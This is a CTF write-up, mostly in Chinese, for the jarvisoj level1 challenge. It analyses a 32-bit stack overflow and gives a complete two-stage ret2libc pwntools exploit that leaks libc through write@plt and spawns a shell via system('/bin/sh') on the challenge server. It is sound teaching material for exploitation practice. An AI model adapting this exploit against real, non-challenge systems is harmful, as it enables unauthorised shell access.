jarvisoj level1
# jarvisoj level1
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/jarvisoj_level1/level1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
# 静态分析
主函数如下:
// Decompiled entry point. All untrusted input handling happens inside
// vulnerable_function(); main itself only prints a fixed message afterwards.
int __cdecl main(int argc, const char **argv, const char **envp)
{
vulnerable_function(); // the stack overflow happens in here
write(1, "Hello, World!\n", 0xEu); // 0xE == strlen("Hello, World!\n")
return 0;
}
vulnerable_function函数如下:
// Decompiled. buf sits at ebp-0x88, i.e. 0x88 bytes below the saved ebp,
// but read() is allowed to write up to 0x100 bytes into it: anything past
// 0x88 bytes overwrites the saved ebp, and the 4 bytes after that overwrite
// the return address. No stack canary exists to detect this (see checksec).
// The printf additionally discloses buf's stack address to the caller.
ssize_t vulnerable_function()
{
char buf; // [esp+0h] [ebp-88h]
printf("What's this:%p?\n", &buf); // info leak of the stack address (local only; the remote does not echo it)
return read(0, &buf, 0x100u); // 0x100 > 0x88: unbounded relative to the buffer -> stack overflow
}
# 思路分析
目前信息:
- vulnerable_function 函数存在溢出点
- No canary found
- NX disabled
- No PIE
- Has RWX segments
思路:
- 有 RWX 权限,栈上 buf 地址已知,采用 ret2shellcode
- 有问题: 本地环境与远程环境不同,远程不回显无法得到 buf 地址,最终采用 ret2libc
做法:
- 本地环境与远程环境不同,远程不回显无法得到 buf 地址,因此改用 ret2libc
# exp
# Two-stage ret2libc for jarvisoj level1. It relies on three missing
# mitigations reported by checksec above: no stack canary (the overflow is
# not detected), no PIE (write@plt and main have fixed addresses) and
# Partial RELRO (the GOT entry of read is resolved in place and readable).
from pwn import *
from LibcSearcher import *
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/jarvisoj_level1/level1'
elf = ELF(pwnfile)
io = remote("node4.buuoj.cn", 25274)
# io = process(pwnfile)
# 0x88 bytes fill buf (at ebp-0x88), 4 more cover the saved ebp; the next
# dword lands on the saved return address.
padding = 0x88+4
write_plt = elf.plt['write']
read_got = elf.got['read']
main_addr = elf.symbols['main']
# Stage 1: return into write@plt with arguments (1, read_got, 4) so the
# program prints the libc address stored in read's GOT entry; main_addr is
# write's "return address", so the program asks for input a second time.
payload = flat(['a'*padding, write_plt, main_addr, 1, read_got, 4])
io.send(payload)
# The remote service does not echo the "What's this" prompt, so the first
# bytes received are the 4-byte leak. NOTE(review): assumes recv(4) returns
# all 4 bytes in one call — confirm against the remote.
leak_read_addr = u32(io.recv(4))
# Identify the remote libc from the leaked read address, then derive the
# absolute addresses of system and the "/bin/sh" string from its offsets.
libc = LibcSearcher('read', leak_read_addr)
libc_base = leak_read_addr-libc.dump('read')
system_addr = libc_base+libc.dump('system')
bin_sh = libc_base+libc.dump('str_bin_sh')
# Stage 2: second overflow returns into system("/bin/sh"); 0xdeadbeef is a
# placeholder return address for system.
payload = flat(['a'*padding, system_addr, 0xdeadbeef, bin_sh])
io.send(payload)
io.interactive()
上次更新: 2022/08/15, 00:29:49